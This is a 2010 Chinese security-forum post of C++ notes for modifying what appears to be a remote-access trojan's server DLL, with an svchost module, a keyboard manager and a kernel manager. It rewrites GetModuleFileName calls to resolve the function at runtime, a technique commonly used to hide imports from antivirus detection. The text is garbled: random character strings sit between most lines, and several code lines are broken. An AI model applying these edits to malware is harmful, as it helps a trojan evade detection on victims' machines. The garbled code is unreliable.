标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
, Z d% M% m3 E8 w; @( [
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
6 z$ I5 l' a4 N, q( I" j0 y
----------------------------------------
1 j- G1 ]$ r# J8 D
DTDY.h:
; b; n# \0 M/ R, o" |$ j* i
& N- M* u& f7 b7 ]- c6 I6 G: O5 ^0 l
#if _MSC_VER>1000
+ G- h- X) u3 z% X6 ~5 L
#pragma once
2 {1 v/ V, r9 R- [. H/ l# O
#endif //_MSC_VER>1000
! z# }4 _, P( i! d* D, P
#include<windows.h>
" I) J. F: z4 X( @* X
7 }# K3 K% e3 l b! U3 @2 A% a! T
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
/ Q/ c( o5 S" d, p4 l
class DTDY
) V' J! z8 L- T- C( W
{
+ K& D+ y9 \# C. M8 |! H0 h
public:
% g! h* d% n: N' ]) \) F
DTDY();
- i4 d% S D2 S! @
virtual ~DTDY();
3 x( x9 n$ {$ I* @
public:
! q# a9 w# Y4 K' n8 ^& |% h
static pGetModuleFileNameA MyGetModuleFileName;
6 e9 U0 ]% U, G
static BOOL FunInitiallization();
4 U3 C' d3 V- p' ~ k
};
3 J7 X. }9 B% d% R
#endif
: H( N- d: Z+ u' U+ i' _
----------------------------------------
* j( t9 b' o& ]6 r
9 h. V. {" B6 [& s, l2 k
DTDY.cpp:
: T" z1 j+ y k* P1 k" k' N
6 b7 z ^8 Z& N! U$ b7 F b( P+ `
#include "DTDY.h"
, H% E" l: v' ]& j+ o5 d: y
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
6 e1 U. A: h" g p& D! {* t/ o h
DTDY:TDY()
2 q4 x2 I: b3 l+ R ~3 m* r
{
( ?( w7 D) {* i/ q. ?9 K. b+ p
}
. W4 K8 D |* }) V/ `6 s# D4 R- d
DTDY::~DTDY()
* }" ]% _" X" n9 o
{
4 f; H" O0 K; `
}
0 F }. i; t) f1 a0 `+ G, M
BOOL DTDY::FunInitiallization()
1 J1 Q; [8 M+ S; s3 J
{
$ s9 N6 c0 {' h; Q3 h
HMODULE hModule=LoadLibrary("kernel32.dll");
( w6 E9 K5 P* l6 t
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
- L& R6 e/ e+ j+ S
if(!MyGetModuleFileName=) return FALSE;
6 ?" T) N* {6 z# z
9 m+ G3 \ `% q0 {, a( h: z* m m- z z+ f
return TRUE;
: h: j. n# y' N. S* @* N! i
}
/ U4 j% ]7 v" w1 D( ?* d6 s
----------------------------------------
3 k- a8 h' w w
svchost.cpp:
( {' |+ L0 D2 h4 S4 a8 z; q
% ~/ \! A! n7 ~& Q# I9 b
#include "DTDY.h"
% U9 t! D3 P3 R- l# j
- Y) I# y$ ?4 V7 q+ c
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
% I4 g8 r5 T0 Y2 N: D: S2 |. Q
{
; e# V! R/ s6 K9 Q% L2 g- H
switch(ul_reason_for_call)
1 g, _. W# h! q) W
{
0 E, C- h8 n( m6 Q8 m
case DLL_PROCESS_ATTACH:
! J: ]; h6 N1 ~
if(!DTDY::FunInitiallization()) return FALSE;
' i. j( P. b. j9 v; O; _
' z2 }! x, X8 o# g0 }6 l* R4 ?7 }
break;
+ s: q& {+ D, w- e t- V8 X+ J n
}
! `; y4 V) W# c7 [/ r
}
. C; R* I/ c& T
6 Q5 E2 V1 x- F8 {
$ s3 o8 L* U& K0 i
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
* U. J; O, S$ x3 G( z- I
改写为
, d' l; e( z# w5 j( W
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
9 O, P- I8 B$ h% c0 Q
----------------------------------------
& ~8 b; b2 m8 `4 M2 w* I% z$ Q
KernelManager.cpp:
5 s# n" o$ H: ?5 Q; ]$ c, Y, R
2 M! s7 P, ^* x
#include "../DTDY.h"
$ z' N/ x% B. ^
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
$ w5 e4 W; S0 Z; R
改写为
$ `8 S0 K- w' ]. B ^$ x
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
: S- _: }8 O- B! r2 w4 a9 ~
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
